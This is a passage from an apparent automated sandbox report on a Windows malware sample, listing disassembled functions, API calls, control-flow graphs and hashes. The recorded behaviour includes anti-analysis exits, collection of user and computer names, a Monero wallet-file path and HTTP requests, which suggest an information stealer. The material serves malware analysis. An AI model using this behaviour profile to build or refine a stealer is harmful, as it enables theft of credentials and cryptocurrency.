                                          • Part of subcall function 00A552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55318
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A5532F
                                          • Part of subcall function 00A552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A55364
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A55383
                                          • Part of subcall function 00A552C0: lstrlen.KERNEL32(00000000), ref: 00A553AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A5578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00A55A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: b3c05009e26d6561a511183647fcabea119ddd9560e1e27072448a35209be49a
                                        • Instruction ID: 07de5aa348d03e6cfd2b9801bbe63f9c810c257438ad044acfd6d1317915f86a
                                        • Opcode Fuzzy Hash: b3c05009e26d6561a511183647fcabea119ddd9560e1e27072448a35209be49a
                                        • Instruction Fuzzy Hash: B6E15271E10104AADB14FBB0DE56EED7738BF64341F508629B90766091EF346B4DCBA2
                                        Function 00A517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 a517a0-a517cd call a5aad0 StrCmpCA 1304 a517d7-a517f1 call a5aad0 1301->1304 1305 a517cf-a517d1 ExitProcess 1301->1305 1309 a517f4-a517f8 1304->1309 1310 a519c2-a519cd call a5a800 1309->1310 1311 a517fe-a51811 1309->1311 1313 a51817-a5181a 1311->1313 1314 a5199e-a519bd 1311->1314 1316 a51821-a51830 call a5a820 1313->1316 1317 a518ad-a518be StrCmpCA 1313->1317 1318 a518cf-a518e0 StrCmpCA 1313->1318 1319 a5198f-a51999 call a5a820 1313->1319 1320 a51849-a51858 call a5a820 1313->1320 1321 a51835-a51844 call a5a820 1313->1321 1322 a518f1-a51902 StrCmpCA 1313->1322 1323 a51951-a51962 StrCmpCA 1313->1323 1324 a51970-a51981 StrCmpCA 1313->1324 1325 a51913-a51924 StrCmpCA 1313->1325 1326 a51932-a51943 StrCmpCA 1313->1326 1327 a5185d-a5186e StrCmpCA 1313->1327 1328 a5187f-a51890 StrCmpCA 1313->1328 1314->1309 1316->1314 1333 a518c0-a518c3 1317->1333 1334 a518ca 1317->1334 1335 a518e2-a518e5 1318->1335 1336 a518ec 1318->1336 1319->1314 1320->1314 1321->1314 1337 a51904-a51907 1322->1337 1338 a5190e 1322->1338 1343 a51964-a51967 1323->1343 1344 a5196e 1323->1344 1346 a51983-a51986 1324->1346 1347 a5198d 1324->1347 1339 a51926-a51929 1325->1339 1340 a51930 1325->1340 1341 a51945-a51948 1326->1341 1342 a5194f 1326->1342 1329 a51870-a51873 1327->1329 1330 a5187a 1327->1330 1331 a51892-a5189c 1328->1331 1332 a5189e-a518a1 1328->1332 1329->1330 1330->1314 1352 a518a8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00A517C5
                                        • ExitProcess.KERNEL32 ref: 00A517D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: e11f905fb3dd1ad8101ce208488546b729867209f9272907dcd40c813a2380c1
                                        • Instruction ID: 15fc8ab9e77b5976dc187dc15236da0481aff20cb7b5e0ba36adf7167e75041a
                                        • Opcode Fuzzy Hash: e11f905fb3dd1ad8101ce208488546b729867209f9272907dcd40c813a2380c1
                                        • Instruction Fuzzy Hash: 4F517BB4B00209EFDB04DFA0D954BBE77B5BF44706F10854DE906AB280E770E989CB66
                                        Function 00A57500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 a57500-a5754a GetWindowsDirectoryA 1357 a57553-a575c7 GetVolumeInformationA call a58d00 * 3 1356->1357 1358 a5754c 1356->1358 1365 a575d8-a575df 1357->1365 1358->1357 1366 a575e1-a575fa call a58d00 1365->1366 1367 a575fc-a57617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 a57619-a57626 call a5a740 1367->1369 1370 a57628-a57658 wsprintfA call a5a740 1367->1370 1377 a5767e-a5768e 1369->1377 1370->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A57542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A5760A
                                        • wsprintfA.USER32 ref: 00A57640
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 3af9c2b03f89766d39b5fa83b463085dd48d620c6ee48301799908c9ae857a21
                                        • Instruction ID: 65f473dea2befbe61296fad37aef70fc25a7f7964193914ba1fdd0167264f9a8
                                        • Opcode Fuzzy Hash: 3af9c2b03f89766d39b5fa83b463085dd48d620c6ee48301799908c9ae857a21
                                        • Instruction Fuzzy Hash: 614182B1D04248ABDB10DF94DD45BDEBBB8BF18705F100199F90977280E779AA48CBA5
                                        Function 00A569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600CD8), ref: 00A598A1
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E10), ref: 00A598BA
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600C60), ref: 00A598D2
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600ED0), ref: 00A598EA
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E28), ref: 00A59903
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01608FF8), ref: 00A5991B
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6A00), ref: 00A59933
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6740), ref: 00A5994C
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600CF0), ref: 00A59964
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E40), ref: 00A5997C
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600F00), ref: 00A59995
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E70), ref: 00A599AD
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6900), ref: 00A599C5
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600C78), ref: 00A599DE
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A411D0: ExitProcess.KERNEL32 ref: 00A41211
                                          • Part of subcall function 00A41160: GetSystemInfo.KERNEL32(?), ref: 00A4116A
                                          • Part of subcall function 00A41160: ExitProcess.KERNEL32 ref: 00A4117E
                                          • Part of subcall function 00A41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A4112B
                                          • Part of subcall function 00A41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A41132
                                          • Part of subcall function 00A41110: ExitProcess.KERNEL32 ref: 00A41143
                                          • Part of subcall function 00A41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A4123E
                                          • Part of subcall function 00A41220: __aulldiv.LIBCMT ref: 00A41258
                                          • Part of subcall function 00A41220: __aulldiv.LIBCMT ref: 00A41266
                                          • Part of subcall function 00A41220: ExitProcess.KERNEL32 ref: 00A41294
                                          • Part of subcall function 00A56770: GetUserDefaultLangID.KERNEL32 ref: 00A56774
                                          • Part of subcall function 00A41190: ExitProcess.KERNEL32 ref: 00A411C6
                                          • Part of subcall function 00A57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                          • Part of subcall function 00A57850: RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                          • Part of subcall function 00A57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                          • Part of subcall function 00A578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                          • Part of subcall function 00A578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                          • Part of subcall function 00A578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A56AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00A56AF9
                                        • Sleep.KERNEL32(00001770), ref: 00A56B04
                                        • CloseHandle.KERNEL32(?,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56B1A
                                        • ExitProcess.KERNEL32 ref: 00A56B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 2fe0e4cdc316706ab2c5ea89b1e7e8135bb7c0127b23c4e65212602f672ae207
                                        • Instruction ID: 832189fcc0d1f7533cf9cc64d28c22cfd85d4d55d53071fe457b924eb91e13b9
                                        • Opcode Fuzzy Hash: 2fe0e4cdc316706ab2c5ea89b1e7e8135bb7c0127b23c4e65212602f672ae207
                                        • Instruction Fuzzy Hash: 6C315471E00108ABDB04F7F0DE56BEE7778BF64342F404619FA02A2191EF706949C7A6
                                        Function 00A41220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 a41220-a41247 call a589b0 GlobalMemoryStatusEx 1439 a41273-a4127a 1436->1439 1440 a41249-a41271 call a5da00 * 2 1436->1440 1441 a41281-a41285 1439->1441 1440->1441 1443 a41287 1441->1443 1444 a4129a-a4129d 1441->1444 1446 a41292-a41294 ExitProcess 1443->1446 1447 a41289-a41290 1443->1447 1447->1444 1447->1446
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A4123E
                                        • __aulldiv.LIBCMT ref: 00A41258
                                        • __aulldiv.LIBCMT ref: 00A41266
                                        • ExitProcess.KERNEL32 ref: 00A41294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: ac62ec31f0e188dc92b3f4452dbcc9173fec23f2c1fbd0d22b233e0fec950591
                                        • Instruction ID: 29a2ed572a692285f08b021285168c22c196ddaf6e2c6c833bbe314032a86e87
                                        • Opcode Fuzzy Hash: ac62ec31f0e188dc92b3f4452dbcc9173fec23f2c1fbd0d22b233e0fec950591
                                        • Instruction Fuzzy Hash: 09016DB0E44308FAEB10DBE0CD49BDEBB78BB44702F208059E705F62C0E7B455858799
                                        Function 00A56AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 a56af3 1451 a56b0a 1450->1451 1453 a56b0c-a56b22 call a56920 call a55b10 CloseHandle ExitProcess 1451->1453 1454 a56aba-a56ad7 call a5aad0 OpenEventA 1451->1454 1459 a56af5-a56b04 CloseHandle Sleep 1454->1459 1460 a56ad9-a56af1 call a5aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A56AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00A56AF9
                                        • Sleep.KERNEL32(00001770), ref: 00A56B04
                                        • CloseHandle.KERNEL32(?,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56B1A
                                        • ExitProcess.KERNEL32 ref: 00A56B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 554985fc36d15cdbe145afd68778f97ba1c2c2176cbcc0f3153d7810c84097fb
                                        • Instruction ID: 74c57f862819488063f084421d12ab4264b82c9a1f692180d6df049accac292c
                                        • Opcode Fuzzy Hash: 554985fc36d15cdbe145afd68778f97ba1c2c2176cbcc0f3153d7810c84097fb
                                        • Instruction Fuzzy Hash: E7F05E70A40209ABF700ABA0DD0ABBD7B74FB18742F908515BE03A21D1DBB05548D76A
                                        Function 00A447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 1be8c7f9078f7b3c54b3264ccae1327592cb7cfe2c22ff9d4adb7bbc5c202e96
                                        • Instruction ID: 8257ce4853f2fca032ad3a74bbf5424482d96c0f822f504817ef0974e524bfb1
                                        • Opcode Fuzzy Hash: 1be8c7f9078f7b3c54b3264ccae1327592cb7cfe2c22ff9d4adb7bbc5c202e96
                                        • Instruction Fuzzy Hash: 6B213BB1D00209ABDF14DFA5ED49BDE7B75FB44320F108625FA25A7291EB706A09CB81
                                        Function 00A551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A46280: InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                          • Part of subcall function 00A46280: StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                          • Part of subcall function 00A46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                          • Part of subcall function 00A46280: HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                          • Part of subcall function 00A46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                          • Part of subcall function 00A46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
